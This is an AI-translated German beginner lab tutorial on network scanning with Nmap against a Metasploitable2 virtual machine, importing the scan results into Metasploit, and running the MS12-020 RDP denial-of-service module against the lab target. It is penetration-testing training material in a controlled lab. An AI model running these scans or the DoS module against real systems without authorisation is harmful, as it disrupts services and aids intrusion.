Verwenden Sie Nmap und Metasploit für Netzwerkscans und Schwachstellenanalyse

CybersecurityCybersecurityBeginner
Jetzt üben

💡 Dieser Artikel wurde von AI-Assistenten übersetzt. Um die englische Version anzuzeigen, können Sie hier klicken

Einführung

In diesem Lab lernen Sie, wie Sie Nmap und Metasploit für Netzwerkscans und Schwachstellenanalysen verwenden können. Nmap (Network Mapper) ist ein leistungsstarkes Open-Source-Tool für die Netzwerkermittlung und Sicherheitsüberprüfung, während Metasploit ein weit verbreitetes Penetration-Testing-Framework ist, das eine Vielzahl von Exploitationstools und Payloads enthält.

Das Ziel dieses Labs besteht darin, Ihnen praktische Erfahrungen bei der Verwendung von Nmap für verschiedene Arten von Scans zu vermitteln, die Ergebnisse zu analysieren und Metasploit zu nutzen, um potenzielle Schwachstellen auf einem Zielsystem weiter zu untersuchen.

Einrichten der Umgebung

In diesem Schritt richten Sie die Lab-Umgebung ein, indem Sie den Kali Linux-Container und die Metasploitable2-Virtuelle Maschine starten.

sudo virsh start Metasploitable2

Warten Sie, bis die Zielmaschine gestartet ist. Dies kann 1-3 Minuten dauern.

Testen Sie, ob die virtuelle Maschine gestartet und läuft, indem Sie sie per Ping testen:

ping 192.168.122.102

Starten Sie als Nächstes den Kali Linux-Container und treten Sie in seine Bash-Umgebung ein:

docker run -ti --network host b5b709a49cd5 bash

Testen Sie die virtuelle Netzwerkverbindung im Kali-Container. Verwenden Sie Ctrl-C, um den Ping-Vorgang zu beenden:

ping 192.168.122.102

Grundlegende Verwendung von Nmap

In diesem Schritt lernen Sie, wie Sie Nmap für grundlegende Scantasks wie Host-Discovery (Host-Ermittlung), Port-Scanning (Port-Scan), Version-Detection (Versionserkennung) und Betriebssystemerkennung verwenden können.

Führen Sie einen umfassenden Scan durch, indem Sie den folgenden Befehl ausführen:

nmap -T4 -A 192.168.122.102

Führen Sie einen Host-Discovery-Scan durch, indem Sie den folgenden Befehl ausführen:

nmap -T4 -sn 192.168.122.102

Führen Sie einen Port-Scan durch, indem Sie den folgenden Befehl ausführen:

nmap -T4 192.168.122.102

Führen Sie die Betriebssystemerkennung durch, indem Sie den folgenden Befehl ausführen:

nmap -T4 -O 192.168.122.102

Die Option -T4 setzt die Timing-Vorlage (Zeitsteuerung) auf einen aggressiven Scan, während die Option -A die Betriebssystemerkennung, das Version-Scanning, das Script-Scanning und das Traceroute aktiviert. Die Option -sn führt einen einfachen Host-Discovery-Scan durch, und die Option -O versucht, das entfernte Betriebssystem zu erkennen.

Fortgeschrittene Verwendung von Nmap

In diesem Schritt werden Sie fortgeschrittenere Nmap-Scantechniken erkunden, wie das Scannen ganzer Subnetze, bestimmter Portbereiche und die Angabe einer Netzwerkschnittstelle.

Scannen Sie ein gesamtes Subnetz, indem Sie den folgenden Befehl ausführen:

nmap 127.0.0.1/24

Scannen Sie bestimmte Ports, indem Sie den folgenden Befehl ausführen:

nmap -p80,22,66 127.0.0.1

Listen Sie lokale Netzwerkschnittstellen auf, indem Sie den folgenden Befehl ausführen:

nmap --iflist

Geben Sie eine Netzwerkschnittstelle an, indem Sie den folgenden Befehl ausführen:

nmap -e eth0 127.0.0.1

Diese fortgeschrittenen Techniken ermöglichen es Ihnen, Ihre Scans zu optimieren und detailliertere Informationen über das Zielnetzwerk oder die Zielhosts zu sammeln.

Importieren von Nmap-Scanergebnissen in Metasploit

In diesem Schritt lernen Sie, wie Sie Nmap-Scanergebnisse in Metasploit importieren, um sie weiter zu analysieren und auszunutzen.

  1. Führen Sie einen umfassenden Scan durch und speichern Sie die Ausgabe in einer XML-Datei, indem Sie den folgenden Befehl ausführen. Stellen Sie sicher, dass Sie die XML-Datei im Home-Verzeichnis ~/ ablegen. Dieser Schritt kann einige Zeit in Anspruch nehmen:
nmap -sV -Pn -oX ~/shiyanlou.xml 192.168.122.102/24
  1. Starten Sie die Metasploit-Konsole:
cd ~
service postgresql start
msfdb init
msfconsole
  1. Importieren Sie die XML-Datei in Metasploit, indem Sie den folgenden Befehl in der Metasploit-Konsole ausführen:
db_import shiyanlou.xml
  1. Zeigen Sie die importierten Dienste an, indem Sie den folgenden Befehl in der Metasploit-Konsole ausführen:
services
  1. Drücken Sie Ctrl+D, um die Metasploit-Konsole zu beenden, und starten Sie dann die Prüfung

Durch das Importieren der Nmap-Scanergebnisse in Metasploit können Sie die leistungsstarken Tools und Module des Metasploit-Frameworks nutzen, um Schwachstellen auf dem Zielsystem zu analysieren und möglicherweise auszunutzen.

Verwenden von Modulen in Metasploit

In diesem Schritt lernen Sie, wie Sie nach Modulen im Metasploit-Framework suchen und diese nutzen können.

  1. Zunächst sollten Sie, wenn Sie nicht bereits in der Metasploit-Konsole sind, die Metasploit-Konsole starten:
cd ~
msfconsole
  1. Jetzt können Sie mithilfe des Befehls search in der Metasploit-Konsole nach Modulen suchen:
search ms12-020
  1. Um ein Modul in der Metasploit-Konsole zu verwenden:
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
  1. Zeigen Sie die verfügbaren Optionen für das Modul in der Metasploit-Konsole an:
show options
  1. Legen Sie die erforderlichen Optionen in der Metasploit-Konsole fest:
set RHOST 192.168.122.102
  1. Führen Sie das Modul in der Metasploit-Konsole aus:
exploit
  1. Drücken Sie Ctrl+D, um die Metasploit-Konsole zu beenden, und starten Sie dann die Prüfung

Metasploit bietet eine Vielzahl von Modulen für verschiedene Zwecke, wie Exploits, Payloads, Hilfsmodule und mehr. Indem Sie nach dem geeigneten Modul suchen und es verwenden, können Sie versuchen, Schwachstellen auszunutzen oder andere Aktionen auf dem Zielsystem auszuführen.

Zusammenfassung

In diesem Lab haben Sie gelernt, wie Sie Nmap für Netzwerkscans und Informationsgewinnung nutzen können, sowie wie Sie die Scanergebnisse in Metasploit importieren, um sie weiter zu analysieren und auszunutzen. Sie haben praktische Erfahrungen mit verschiedenen Nmap-Scantechniken gesammelt, darunter Host-Discovery (Host-Ermittlung), Port-Scanning (Port-Scan), Version-Detection (Versionserkennung) und Betriebssystemerkennung. Darüber hinaus haben Sie gelernt, wie Sie im Metasploit-Framework nach Modulen suchen und diese nutzen können, um möglicherweise Schwachstellen auf dem Zielsystem auszunutzen.

Im Laufe des Labs haben Sie essentielle Fähigkeiten für Penetrationstests geübt, wie das Einrichten einer kontrollierten Umgebung, das Durchführen von Reconnaissance (Aufklärung) und das Analysieren potenzieller Schwachstellen. Diese Fähigkeiten sind im Bereich der Cybersicherheit von entscheidender Bedeutung und helfen Ihnen, ein tieferes Verständnis von Netzwerksicherheitskonzepten und ethischen Hacking-Techniken zu entwickeln.